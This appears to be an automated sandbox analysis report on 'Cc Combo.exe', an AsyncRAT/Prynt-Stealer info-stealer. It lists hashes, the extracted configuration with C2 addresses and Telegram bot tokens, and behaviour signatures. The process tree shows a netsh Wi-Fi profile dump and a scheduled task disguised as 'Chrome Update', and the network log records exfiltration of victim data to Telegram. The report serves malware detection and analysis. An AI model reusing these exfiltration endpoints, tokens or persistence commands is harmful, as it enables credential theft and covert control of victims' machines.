Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Analysis

  • max time kernel
    149s
  • max time network
    133s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240802-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system
  • submitted
    12/09/2024, 19:36 UTC

General

  • Target

    Cc Combo.exe

  • Size

    232KB

  • MD5

    e074dece1afd2a20f7e479a8319a7857

  • SHA1

    9f8ae4d5373955498cb15d1b75f190e105f23186

  • SHA256

    cdcfe612d9253b3104b432ff622a9f7a4271059eb3ded0b2f056be9d9950d78f

  • SHA512

    5f232ed6f0dc29d913571614b39e353ea08941dde9ec07ca7925a5de17b97b1526e4f548421f703677a3b19babb4bc00310966e31f2a0bad02ff4bfa97b2a2a0

  • SSDEEP

    6144:DDubaBBOBIIj6HLLYLCYJqvc1DegW1Db/Q/HbMhQLYiUJiz1o/65:GbaVgibWJLYxJem/6

Malware Config

Extracted

Family

asyncrat

Botnet

Default

C2

127.0.0.1:6606

127.0.0.1:7707

127.0.0.1:8808

https://api.telegram.org/bot7014456621:AAE7BXbm_jQfLpnUdyLpTUwGXyLN5AXvThw/sendMessage?chat_id=7389740990

Mutex

AsyncMutex_6SI8OkPnk

Attributes
  • delay

    3

  • install

    false

  • install_folder

    %AppData%

aes.plain
1
zpjHs6T6rkcwmUaD4DMIIneaxwhkd83D

Signatures

  • AsyncRat

    AsyncRAT is designed to remotely monitor and control other computers written in C#.

  • StormKitty

    StormKitty is an open source info stealer written in C#.

  • StormKitty payload 1 IoCs
  • Credentials from Password Stores: Credentials from Web Browsers 1 TTPs

    Malicious Access or copy of Web Browser Credential store.

  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Drops desktop.ini file(s) 8 IoCs
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Looks up geolocation information via web service

    Uses a legitimate geolocation service to find the infected system's geolocation info.

  • Browser Information Discovery 1 TTPs

    Enumerate browser information.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Event Triggered Execution: Netsh Helper DLL 1 TTPs 6 IoCs

    Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

  • System Location Discovery: System Language Discovery 1 TTPs 9 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • System Network Configuration Discovery: Wi-Fi Discovery 1 TTPs 2 IoCs

    Adversaries may search for information about Wi-Fi networks, such as network names and passwords, on compromised systems.

  • Checks processor information in registry 2 TTPs 2 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of WriteProcessMemory 24 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\Cc Combo.exe
    "C:\Users\Admin\AppData\Local\Temp\Cc Combo.exe"
    1⤵
    • Checks computer location settings
    • Drops desktop.ini file(s)
    • System Location Discovery: System Language Discovery
    • Checks processor information in registry
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:5368
    • C:\Windows\SysWOW64\cmd.exe
      "cmd.exe" /C chcp 65001 && netsh wlan show profile | findstr All
      2⤵
      • System Location Discovery: System Language Discovery
      • System Network Configuration Discovery: Wi-Fi Discovery
      • Suspicious use of WriteProcessMemory
      PID:2400
      • C:\Windows\SysWOW64\chcp.com
        chcp 65001
        3⤵
        • System Location Discovery: System Language Discovery
        PID:4944
      • C:\Windows\SysWOW64\netsh.exe
        netsh wlan show profile
        3⤵
        • Event Triggered Execution: Netsh Helper DLL
        • System Location Discovery: System Language Discovery
        • System Network Configuration Discovery: Wi-Fi Discovery
        PID:5664
      • C:\Windows\SysWOW64\findstr.exe
        findstr All
        3⤵
        • System Location Discovery: System Language Discovery
        PID:1160
    • C:\Windows\SysWOW64\cmd.exe
      "cmd.exe" /C chcp 65001 && netsh wlan show networks mode=bssid
      2⤵
      • System Location Discovery: System Language Discovery
      • Suspicious use of WriteProcessMemory
      PID:4476
      • C:\Windows\SysWOW64\chcp.com
        chcp 65001
        3⤵
        • System Location Discovery: System Language Discovery
        PID:3312
      • C:\Windows\SysWOW64\netsh.exe
        netsh wlan show networks mode=bssid
        3⤵
        • Event Triggered Execution: Netsh Helper DLL
        • System Location Discovery: System Language Discovery
        PID:5188
    • C:\Windows\SysWOW64\schtasks.exe
      "C:\Windows\System32\schtasks.exe" /create /f /sc ONLOGON /RL HIGHEST /tn "Chrome Update" /tr "C:\Users\Admin\AppData\Local\Temp\Cc Combo.exe"
      2⤵
      • System Location Discovery: System Language Discovery
      • Scheduled Task/Job: Scheduled Task
      PID:4028
  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --field-trial-handle=4380,i,2904906934812054273,11716976550456127484,262144 --variations-seed-version --mojo-platform-channel-handle=1288 /prefetch:8
    1⤵
      PID:4048

    Network

    • flag-us
      DNS
      8.8.8.8.in-addr.arpa
      Remote address:
      8.8.8.8:53
      Request
      8.8.8.8.in-addr.arpa
      IN PTR
      Response
      8.8.8.8.in-addr.arpa
      IN PTR
      dnsgoogle
    • flag-us
      DNS
      154.239.44.20.in-addr.arpa
      Remote address:
      8.8.8.8:53
      Request
      154.239.44.20.in-addr.arpa
      IN PTR
      Response
    • flag-us
      DNS
      172.214.232.199.in-addr.arpa
      Remote address:
      8.8.8.8:53
      Request
      172.214.232.199.in-addr.arpa
      IN PTR
      Response
    • flag-us
      DNS
      0.181.190.20.in-addr.arpa
      Remote address:
      8.8.8.8:53
      Request
      0.181.190.20.in-addr.arpa
      IN PTR
      Response
    • flag-us
      DNS
      95.221.229.192.in-addr.arpa
      Remote address:
      8.8.8.8:53
      Request
      95.221.229.192.in-addr.arpa
      IN PTR
      Response
    • flag-us
      DNS
      icanhazip.com
      Cc Combo.exe
      Remote address:
      8.8.8.8:53
      Request
      icanhazip.com
      IN A
      Response
      icanhazip.com
      IN A
      104.16.185.241
      icanhazip.com
      IN A
      104.16.184.241
    • flag-us
      GET
      http://icanhazip.com/
      Cc Combo.exe
      Remote address:
      104.16.185.241:80
      Request
      GET / HTTP/1.1
      Host: icanhazip.com
      Connection: Keep-Alive
      Response
      HTTP/1.1 200 OK
      Date: Thu, 12 Sep 2024 19:37:19 GMT
      Content-Type: text/plain
      Content-Length: 14
      Connection: keep-alive
      Access-Control-Allow-Origin: *
      Access-Control-Allow-Methods: GET
      Set-Cookie: __cf_bm=u4emK4pxfaj8ic1tMTGl8IJEK8DILehYxZgsNGsirHY-1726169839-1.0.1.1-kZgQSYR7Prdol_gnCXifIxHHNkMENBxdaKnlEPDtQFjW1OxRfSMFByxOYvLdngz2XunXYuapspbYDDvBNixPMw; path=/; expires=Thu, 12-Sep-24 20:07:19 GMT; domain=.icanhazip.com; HttpOnly
      Server: cloudflare
      CF-RAY: 8c2259f60fe83dca-LHR
      alt-svc: h3=":443"; ma=86400
    • flag-us
      DNS
      api.mylnikov.org
      Cc Combo.exe
      Remote address:
      8.8.8.8:53
      Request
      api.mylnikov.org
      IN A
      Response
      api.mylnikov.org
      IN A
      172.67.196.114
      api.mylnikov.org
      IN A
      104.21.44.66
    • flag-us
      GET
      https://api.mylnikov.org/geolocation/wifi?v=1.1&bssid=02:79:a9:8c:1e:b7
      Cc Combo.exe
      Remote address:
      172.67.196.114:443
      Request
      GET /geolocation/wifi?v=1.1&bssid=02:79:a9:8c:1e:b7 HTTP/1.1
      Host: api.mylnikov.org
      Connection: Keep-Alive
      Response
      HTTP/1.1 200 OK
      Date: Thu, 12 Sep 2024 19:37:19 GMT
      Content-Type: application/json; charset=utf8
      Content-Length: 88
      Connection: keep-alive
      Access-Control-Allow-Origin: *
      Cache-Control: max-age=2678400
      CF-Cache-Status: MISS
      Last-Modified: Thu, 12 Sep 2024 19:37:19 GMT
      Accept-Ranges: bytes
      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=CBMCkgPVjrxa0hp4jgbwzOiDkB%2Bmgmru2qgBEhRShFn5F2vwpV3%2BSMAMUHbwpghi9CM%2Bj8ZejZFHQdhzDiQZ%2F4jsACiWVBoF2%2B3UmR%2BmX5d8mtWXO%2Fvcqj4vmZwyF1LzWCTq"}],"group":"cf-nel","max_age":604800}
      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
      Strict-Transport-Security: max-age=0; preload
      X-Content-Type-Options: nosniff
      Server: cloudflare
      CF-RAY: 8c2259f82dfebd8e-LHR
      alt-svc: h3=":443"; ma=86400
    • flag-us
      DNS
      241.185.16.104.in-addr.arpa
      Remote address:
      8.8.8.8:53
      Request
      241.185.16.104.in-addr.arpa
      IN PTR
      Response
    • flag-us
      DNS
      api.telegram.org
      Cc Combo.exe
      Remote address:
      8.8.8.8:53
      Request
      api.telegram.org
      IN A
      Response
      api.telegram.org
      IN A
      149.154.167.220
    • flag-nl
      GET
      https://api.telegram.org/bot7014456621:AAE7BXbm_jQfLpnUdyLpTUwGXyLN5AXvThw/sendMessage?chat_id=7389740990&text=%0A%20%20%F0%9F%91%A3%20*Prynt%20Stealer%20New%20Results:*%0ADate:%202024-09-12%207:37:02%20PM%0ASystem:%20Windows%2010%20Pro%20(64%20Bit)%0AUsername:%20Admin%0ACompName:%20SYMRKCCU%0ALanguage:%20%F0%9F%87%BA%F0%9F%87%B8%20en-US%0AAntivirus:%20Not%20installed%0A%0A%20%20%F0%9F%91%A3%20*IP%20Address:*%20%0AGateway%20IP:%2010.127.0.1%0AInternal%20IP:%2010.127.1.116%0AExternal%20IP:%20194.110.13.70%0ABSSID:%2002:79:a9:8c:1e:b7%0A%0A%20%20%F0%9F%91%A3%20*Hardware:*%0ACPU:%2012th%20Gen%20Intel(R)%20Core(TM)%20i5-12400%0AGPU:%20Microsoft%20Basic%20Display%20Adapter%0ARAM:%2016154MB%0AHWID:%20Unknown%0APower:%20NoSystemBattery%20(1%25)%0AScreen:%201280x720%0A%0A%20%20%F0%9F%91%A3%20*Domain%20Detects:*%0A%20%20%20%E2%88%9F%20%F0%9F%8F%A6%20*Banks*%20(No%20data)%0A%20%20%20%E2%88%9F%20%F0%9F%92%B0%20*Crypto*%20(No%20data)%0A%0A%20%20%F0%9F%92%B5%20*Stealer%20Data:*%0A%20%20%20%E2%88%9F%20%F0%9F%94%96%20Bookmarks:%205%0A%0A%20%20%F0%9F%91%A3%20*Installed%20Software:*%0A%0A%20%20%F0%9F%91%A3%20*Local%20Device:*%0A%20%20%20%E2%88%9F%20%F0%9F%97%9D%20Windows%20product%20key%0A%20%20%20%E2%88%9F%20%F0%9F%8C%83%20Desktop%20screenshot%0A%0A%20%20%F0%9F%91%A3%20*Files:*%0A%20%20%20%E2%88%9F%20%F0%9F%93%82%20Database%20files:%206%0A%0A%20%20%F0%9F%91%A3%20Solen%20Useing%20Prynt%20Stealer%0A%0A%20%20%F0%9F%91%A3%20Developed%20By%20@FlatLineStealerUpdated%0A%0A%20%20%F0%9F%91%A3%20Or%20Join%20The%20Channel%20@pryntdotmarket&parse_mode=Markdown&disable_web_page_preview=True
      Cc Combo.exe
      Remote address:
      149.154.167.220:443
      Request
      GET /bot7014456621:AAE7BXbm_jQfLpnUdyLpTUwGXyLN5AXvThw/sendMessage?chat_id=7389740990&text=%0A%20%20%F0%9F%91%A3%20*Prynt%20Stealer%20New%20Results:*%0ADate:%202024-09-12%207:37:02%20PM%0ASystem:%20Windows%2010%20Pro%20(64%20Bit)%0AUsername:%20Admin%0ACompName:%20SYMRKCCU%0ALanguage:%20%F0%9F%87%BA%F0%9F%87%B8%20en-US%0AAntivirus:%20Not%20installed%0A%0A%20%20%F0%9F%91%A3%20*IP%20Address:*%20%0AGateway%20IP:%2010.127.0.1%0AInternal%20IP:%2010.127.1.116%0AExternal%20IP:%20194.110.13.70%0ABSSID:%2002:79:a9:8c:1e:b7%0A%0A%20%20%F0%9F%91%A3%20*Hardware:*%0ACPU:%2012th%20Gen%20Intel(R)%20Core(TM)%20i5-12400%0AGPU:%20Microsoft%20Basic%20Display%20Adapter%0ARAM:%2016154MB%0AHWID:%20Unknown%0APower:%20NoSystemBattery%20(1%25)%0AScreen:%201280x720%0A%0A%20%20%F0%9F%91%A3%20*Domain%20Detects:*%0A%20%20%20%E2%88%9F%20%F0%9F%8F%A6%20*Banks*%20(No%20data)%0A%20%20%20%E2%88%9F%20%F0%9F%92%B0%20*Crypto*%20(No%20data)%0A%0A%20%20%F0%9F%92%B5%20*Stealer%20Data:*%0A%20%20%20%E2%88%9F%20%F0%9F%94%96%20Bookmarks:%205%0A%0A%20%20%F0%9F%91%A3%20*Installed%20Software:*%0A%0A%20%20%F0%9F%91%A3%20*Local%20Device:*%0A%20%20%20%E2%88%9F%20%F0%9F%97%9D%20Windows%20product%20key%0A%20%20%20%E2%88%9F%20%F0%9F%8C%83%20Desktop%20screenshot%0A%0A%20%20%F0%9F%91%A3%20*Files:*%0A%20%20%20%E2%88%9F%20%F0%9F%93%82%20Database%20files:%206%0A%0A%20%20%F0%9F%91%A3%20Solen%20Useing%20Prynt%20Stealer%0A%0A%20%20%F0%9F%91%A3%20Developed%20By%20@FlatLineStealerUpdated%0A%0A%20%20%F0%9F%91%A3%20Or%20Join%20The%20Channel%20@pryntdotmarket&parse_mode=Markdown&disable_web_page_preview=True HTTP/1.1
      Host: api.telegram.org
      Connection: Keep-Alive
      Response
      HTTP/1.1 200 OK
      Server: nginx/1.18.0
      Date: Thu, 12 Sep 2024 19:37:21 GMT
      Content-Type: application/json
      Content-Length: 1981
      Connection: keep-alive
      Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
      Access-Control-Allow-Origin: *
      Access-Control-Allow-Methods: GET, POST, OPTIONS
      Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
    • flag-nl
      GET
      https://api.telegram.org/bot7014456621:AAE7BXbm_jQfLpnUdyLpTUwGXyLN5AXvThw/sendMessage?chat_id=7389740990&text=%0A%20%20%F0%9F%91%A3%20*Prynt%20Stealer%20New%20Results:*%0ADate:%202024-09-12%207:37:02%20PM%0ASystem:%20Windows%2010%20Pro%20(64%20Bit)%0AUsername:%20Admin%0ACompName:%20SYMRKCCU%0ALanguage:%20%F0%9F%87%BA%F0%9F%87%B8%20en-US%0AAntivirus:%20Not%20installed%0A%0A%20%20%F0%9F%91%A3%20*IP%20Address:*%20%0AGateway%20IP:%2010.127.0.1%0AInternal%20IP:%2010.127.1.116%0AExternal%20IP:%20194.110.13.70%0ABSSID:%2002:79:a9:8c:1e:b7%0A%0A%20%20%F0%9F%91%A3%20*Hardware:*%0ACPU:%2012th%20Gen%20Intel(R)%20Core(TM)%20i5-12400%0AGPU:%20Microsoft%20Basic%20Display%20Adapter%0ARAM:%2016154MB%0AHWID:%20Unknown%0APower:%20NoSystemBattery%20(1%25)%0AScreen:%201280x720%0A%0A%20%20%F0%9F%91%A3%20*Domain%20Detects:*%0A%20%20%20%E2%88%9F%20%F0%9F%8F%A6%20*Banks*%20(No%20data)%0A%20%20%20%E2%88%9F%20%F0%9F%92%B0%20*Crypto*%20(No%20data)%0A%0A%20%20%F0%9F%92%B5%20*Stealer%20Data:*%0A%20%20%20%E2%88%9F%20%F0%9F%94%96%20Bookmarks:%205%0A%0A%20%20%F0%9F%91%A3%20*Installed%20Software:*%0A%0A%20%20%F0%9F%91%A3%20*Local%20Device:*%0A%20%20%20%E2%88%9F%20%F0%9F%97%9D%20Windows%20product%20key%0A%20%20%20%E2%88%9F%20%F0%9F%8C%83%20Desktop%20screenshot%0A%0A%20%20%F0%9F%91%A3%20*Files:*%0A%20%20%20%E2%88%9F%20%F0%9F%93%82%20Database%20files:%206%0A%0A%20%20%F0%9F%91%A3%20Solen%20Useing%20Prynt%20Stealer%0A%0A%20%20%F0%9F%91%A3%20Developed%20By%20@FlatLineStealerUpdated%0A%0A%20%20%F0%9F%91%A3%20Or%20Join%20The%20Channel%20@pryntdotmarket
      Cc Combo.exe
      Remote address:
      149.154.167.220:443
      Request
      GET /bot7014456621:AAE7BXbm_jQfLpnUdyLpTUwGXyLN5AXvThw/sendMessage?chat_id=7389740990&text=%0A%20%20%F0%9F%91%A3%20*Prynt%20Stealer%20New%20Results:*%0ADate:%202024-09-12%207:37:02%20PM%0ASystem:%20Windows%2010%20Pro%20(64%20Bit)%0AUsername:%20Admin%0ACompName:%20SYMRKCCU%0ALanguage:%20%F0%9F%87%BA%F0%9F%87%B8%20en-US%0AAntivirus:%20Not%20installed%0A%0A%20%20%F0%9F%91%A3%20*IP%20Address:*%20%0AGateway%20IP:%2010.127.0.1%0AInternal%20IP:%2010.127.1.116%0AExternal%20IP:%20194.110.13.70%0ABSSID:%2002:79:a9:8c:1e:b7%0A%0A%20%20%F0%9F%91%A3%20*Hardware:*%0ACPU:%2012th%20Gen%20Intel(R)%20Core(TM)%20i5-12400%0AGPU:%20Microsoft%20Basic%20Display%20Adapter%0ARAM:%2016154MB%0AHWID:%20Unknown%0APower:%20NoSystemBattery%20(1%25)%0AScreen:%201280x720%0A%0A%20%20%F0%9F%91%A3%20*Domain%20Detects:*%0A%20%20%20%E2%88%9F%20%F0%9F%8F%A6%20*Banks*%20(No%20data)%0A%20%20%20%E2%88%9F%20%F0%9F%92%B0%20*Crypto*%20(No%20data)%0A%0A%20%20%F0%9F%92%B5%20*Stealer%20Data:*%0A%20%20%20%E2%88%9F%20%F0%9F%94%96%20Bookmarks:%205%0A%0A%20%20%F0%9F%91%A3%20*Installed%20Software:*%0A%0A%20%20%F0%9F%91%A3%20*Local%20Device:*%0A%20%20%20%E2%88%9F%20%F0%9F%97%9D%20Windows%20product%20key%0A%20%20%20%E2%88%9F%20%F0%9F%8C%83%20Desktop%20screenshot%0A%0A%20%20%F0%9F%91%A3%20*Files:*%0A%20%20%20%E2%88%9F%20%F0%9F%93%82%20Database%20files:%206%0A%0A%20%20%F0%9F%91%A3%20Solen%20Useing%20Prynt%20Stealer%0A%0A%20%20%F0%9F%91%A3%20Developed%20By%20@FlatLineStealerUpdated%0A%0A%20%20%F0%9F%91%A3%20Or%20Join%20The%20Channel%20@pryntdotmarket HTTP/1.1
      Host: api.telegram.org
      Response
      HTTP/1.1 200 OK
      Server: nginx/1.18.0
      Date: Thu, 12 Sep 2024 19:37:21 GMT
      Content-Type: application/json
      Content-Length: 1597
      Connection: keep-alive
      Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
      Access-Control-Allow-Origin: *
      Access-Control-Allow-Methods: GET, POST, OPTIONS
      Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
    • flag-us
      DNS
      114.196.67.172.in-addr.arpa
      Remote address:
      8.8.8.8:53
      Request
      114.196.67.172.in-addr.arpa
      IN PTR
      Response
    • flag-us
      DNS
      220.167.154.149.in-addr.arpa
      Remote address:
      8.8.8.8:53
      Request
      220.167.154.149.in-addr.arpa
      IN PTR
      Response
    • flag-nl
      POST
      https://api.telegram.org/bot7014456621:AAE7BXbm_jQfLpnUdyLpTUwGXyLN5AXvThw/sendDocument?chat_id=7389740990
      Cc Combo.exe
      Remote address:
      149.154.167.220:443
      Request
      POST /bot7014456621:AAE7BXbm_jQfLpnUdyLpTUwGXyLN5AXvThw/sendDocument?chat_id=7389740990 HTTP/1.1
      Content-Type: multipart/form-data; boundary="49799353-c840-43a1-9f54-c69126efbf7e"
      Host: api.telegram.org
      Content-Length: 82937
      Expect: 100-continue
      Response
      HTTP/1.1 200 OK
      Server: nginx/1.18.0
      Date: Thu, 12 Sep 2024 19:37:21 GMT
      Content-Type: application/json
      Content-Length: 521
      Connection: keep-alive
      Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
      Access-Control-Allow-Origin: *
      Access-Control-Allow-Methods: GET, POST, OPTIONS
      Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
    • flag-nl
      POST
      https://api.telegram.org/bot1784055443:AAG-bXLYtnFpjJ_L3ogxA3bq6Mx09cqh8ug/sendDocument?chat_id=1937717367
      Cc Combo.exe
      Remote address:
      149.154.167.220:443
      Request
      POST /bot1784055443:AAG-bXLYtnFpjJ_L3ogxA3bq6Mx09cqh8ug/sendDocument?chat_id=1937717367 HTTP/1.1
      Content-Type: multipart/form-data; boundary="835ea170-e024-49e0-8de3-c6a558444bf4"
      Host: api.telegram.org
      Content-Length: 82937
      Expect: 100-continue
      Response
      HTTP/1.1 401 Unauthorized
      Server: nginx/1.18.0
      Date: Thu, 12 Sep 2024 19:37:22 GMT
      Content-Type: application/json
      Content-Length: 58
      Connection: keep-alive
      Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
      Access-Control-Allow-Origin: *
      Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
    • flag-us
      DNS
      google.com
      Cc Combo.exe
      Remote address:
      8.8.8.8:53
      Request
      google.com
      IN A
      Response
      google.com
      IN A
      172.217.169.14
    • flag-us
      DNS
      26.165.165.52.in-addr.arpa
      Remote address:
      8.8.8.8:53
      Request
      26.165.165.52.in-addr.arpa
      IN PTR
      Response
    • flag-us
      DNS
      206.23.85.13.in-addr.arpa
      Remote address:
      8.8.8.8:53
      Request
      206.23.85.13.in-addr.arpa
      IN PTR
      Response
    • flag-us
      DNS
      107.12.20.2.in-addr.arpa
      Remote address:
      8.8.8.8:53
      Request
      107.12.20.2.in-addr.arpa
      IN PTR
      Response
      107.12.20.2.in-addr.arpa
      IN PTR
      a2-20-12-107deploystaticakamaitechnologiescom
    • 104.16.185.241:80
      http://icanhazip.com/
      http
      Cc Combo.exe
      339 B
      708 B
      6
      4

      HTTP Request

      GET http://icanhazip.com/

      HTTP Response

      200
    • 172.67.196.114:443
      https://api.mylnikov.org/geolocation/wifi?v=1.1&bssid=02:79:a9:8c:1e:b7
      tls, http
      Cc Combo.exe
      814 B
      4.3kB
      9
      9

      HTTP Request

      GET https://api.mylnikov.org/geolocation/wifi?v=1.1&bssid=02:79:a9:8c:1e:b7

      HTTP Response

      200
    • 149.154.167.220:443
      https://api.telegram.org/bot7014456621:AAE7BXbm_jQfLpnUdyLpTUwGXyLN5AXvThw/sendMessage?chat_id=7389740990&text=%0A%20%20%F0%9F%91%A3%20*Prynt%20Stealer%20New%20Results:*%0ADate:%202024-09-12%207:37:02%20PM%0ASystem:%20Windows%2010%20Pro%20(64%20Bit)%0AUsername:%20Admin%0ACompName:%20SYMRKCCU%0ALanguage:%20%F0%9F%87%BA%F0%9F%87%B8%20en-US%0AAntivirus:%20Not%20installed%0A%0A%20%20%F0%9F%91%A3%20*IP%20Address:*%20%0AGateway%20IP:%2010.127.0.1%0AInternal%20IP:%2010.127.1.116%0AExternal%20IP:%20194.110.13.70%0ABSSID:%2002:79:a9:8c:1e:b7%0A%0A%20%20%F0%9F%91%A3%20*Hardware:*%0ACPU:%2012th%20Gen%20Intel(R)%20Core(TM)%20i5-12400%0AGPU:%20Microsoft%20Basic%20Display%20Adapter%0ARAM:%2016154MB%0AHWID:%20Unknown%0APower:%20NoSystemBattery%20(1%25)%0AScreen:%201280x720%0A%0A%20%20%F0%9F%91%A3%20*Domain%20Detects:*%0A%20%20%20%E2%88%9F%20%F0%9F%8F%A6%20*Banks*%20(No%20data)%0A%20%20%20%E2%88%9F%20%F0%9F%92%B0%20*Crypto*%20(No%20data)%0A%0A%20%20%F0%9F%92%B5%20*Stealer%20Data:*%0A%20%20%20%E2%88%9F%20%F0%9F%94%96%20Bookmarks:%205%0A%0A%20%20%F0%9F%91%A3%20*Installed%20Software:*%0A%0A%20%20%F0%9F%91%A3%20*Local%20Device:*%0A%20%20%20%E2%88%9F%20%F0%9F%97%9D%20Windows%20product%20key%0A%20%20%20%E2%88%9F%20%F0%9F%8C%83%20Desktop%20screenshot%0A%0A%20%20%F0%9F%91%A3%20*Files:*%0A%20%20%20%E2%88%9F%20%F0%9F%93%82%20Database%20files:%206%0A%0A%20%20%F0%9F%91%A3%20Solen%20Useing%20Prynt%20Stealer%0A%0A%20%20%F0%9F%91%A3%20Developed%20By%20@FlatLineStealerUpdated%0A%0A%20%20%F0%9F%91%A3%20Or%20Join%20The%20Channel%20@pryntdotmarket
      tls, http
      Cc Combo.exe
      4.2kB
      10.9kB
      15
      16

      HTTP Request

      GET https://api.telegram.org/bot7014456621:AAE7BXbm_jQfLpnUdyLpTUwGXyLN5AXvThw/sendMessage?chat_id=7389740990&text=%0A%20%20%F0%9F%91%A3%20*Prynt%20Stealer%20New%20Results:*%0ADate:%202024-09-12%207:37:02%20PM%0ASystem:%20Windows%2010%20Pro%20(64%20Bit)%0AUsername:%20Admin%0ACompName:%20SYMRKCCU%0ALanguage:%20%F0%9F%87%BA%F0%9F%87%B8%20en-US%0AAntivirus:%20Not%20installed%0A%0A%20%20%F0%9F%91%A3%20*IP%20Address:*%20%0AGateway%20IP:%2010.127.0.1%0AInternal%20IP:%2010.127.1.116%0AExternal%20IP:%20194.110.13.70%0ABSSID:%2002:79:a9:8c:1e:b7%0A%0A%20%20%F0%9F%91%A3%20*Hardware:*%0ACPU:%2012th%20Gen%20Intel(R)%20Core(TM)%20i5-12400%0AGPU:%20Microsoft%20Basic%20Display%20Adapter%0ARAM:%2016154MB%0AHWID:%20Unknown%0APower:%20NoSystemBattery%20(1%25)%0AScreen:%201280x720%0A%0A%20%20%F0%9F%91%A3%20*Domain%20Detects:*%0A%20%20%20%E2%88%9F%20%F0%9F%8F%A6%20*Banks*%20(No%20data)%0A%20%20%20%E2%88%9F%20%F0%9F%92%B0%20*Crypto*%20(No%20data)%0A%0A%20%20%F0%9F%92%B5%20*Stealer%20Data:*%0A%20%20%20%E2%88%9F%20%F0%9F%94%96%20Bookmarks:%205%0A%0A%20%20%F0%9F%91%A3%20*Installed%20Software:*%0A%0A%20%20%F0%9F%91%A3%20*Local%20Device:*%0A%20%20%20%E2%88%9F%20%F0%9F%97%9D%20Windows%20product%20key%0A%20%20%20%E2%88%9F%20%F0%9F%8C%83%20Desktop%20screenshot%0A%0A%20%20%F0%9F%91%A3%20*Files:*%0A%20%20%20%E2%88%9F%20%F0%9F%93%82%20Database%20files:%206%0A%0A%20%20%F0%9F%91%A3%20Solen%20Useing%20Prynt%20Stealer%0A%0A%20%20%F0%9F%91%A3%20Developed%20By%20@FlatLineStealerUpdated%0A%0A%20%20%F0%9F%91%A3%20Or%20Join%20The%20Channel%20@pryntdotmarket&parse_mode=Markdown&disable_web_page_preview=True

      HTTP Response

      200

      HTTP Request

      GET https://api.telegram.org/bot7014456621:AAE7BXbm_jQfLpnUdyLpTUwGXyLN5AXvThw/sendMessage?chat_id=7389740990&text=%0A%20%20%F0%9F%91%A3%20*Prynt%20Stealer%20New%20Results:*%0ADate:%202024-09-12%207:37:02%20PM%0ASystem:%20Windows%2010%20Pro%20(64%20Bit)%0AUsername:%20Admin%0ACompName:%20SYMRKCCU%0ALanguage:%20%F0%9F%87%BA%F0%9F%87%B8%20en-US%0AAntivirus:%20Not%20installed%0A%0A%20%20%F0%9F%91%A3%20*IP%20Address:*%20%0AGateway%20IP:%2010.127.0.1%0AInternal%20IP:%2010.127.1.116%0AExternal%20IP:%20194.110.13.70%0ABSSID:%2002:79:a9:8c:1e:b7%0A%0A%20%20%F0%9F%91%A3%20*Hardware:*%0ACPU:%2012th%20Gen%20Intel(R)%20Core(TM)%20i5-12400%0AGPU:%20Microsoft%20Basic%20Display%20Adapter%0ARAM:%2016154MB%0AHWID:%20Unknown%0APower:%20NoSystemBattery%20(1%25)%0AScreen:%201280x720%0A%0A%20%20%F0%9F%91%A3%20*Domain%20Detects:*%0A%20%20%20%E2%88%9F%20%F0%9F%8F%A6%20*Banks*%20(No%20data)%0A%20%20%20%E2%88%9F%20%F0%9F%92%B0%20*Crypto*%20(No%20data)%0A%0A%20%20%F0%9F%92%B5%20*Stealer%20Data:*%0A%20%20%20%E2%88%9F%20%F0%9F%94%96%20Bookmarks:%205%0A%0A%20%20%F0%9F%91%A3%20*Installed%20Software:*%0A%0A%20%20%F0%9F%91%A3%20*Local%20Device:*%0A%20%20%20%E2%88%9F%20%F0%9F%97%9D%20Windows%20product%20key%0A%20%20%20%E2%88%9F%20%F0%9F%8C%83%20Desktop%20screenshot%0A%0A%20%20%F0%9F%91%A3%20*Files:*%0A%20%20%20%E2%88%9F%20%F0%9F%93%82%20Database%20files:%206%0A%0A%20%20%F0%9F%91%A3%20Solen%20Useing%20Prynt%20Stealer%0A%0A%20%20%F0%9F%91%A3%20Developed%20By%20@FlatLineStealerUpdated%0A%0A%20%20%F0%9F%91%A3%20Or%20Join%20The%20Channel%20@pryntdotmarket

      HTTP Response

      200
    • 149.154.167.220:443
      https://api.telegram.org/bot7014456621:AAE7BXbm_jQfLpnUdyLpTUwGXyLN5AXvThw/sendDocument?chat_id=7389740990
      tls, http
      Cc Combo.exe
      87.2kB
      8.0kB
      79
      29

      HTTP Request

      POST https://api.telegram.org/bot7014456621:AAE7BXbm_jQfLpnUdyLpTUwGXyLN5AXvThw/sendDocument?chat_id=7389740990

      HTTP Response

      200
    • 149.154.167.220:443
      https://api.telegram.org/bot1784055443:AAG-bXLYtnFpjJ_L3ogxA3bq6Mx09cqh8ug/sendDocument?chat_id=1937717367
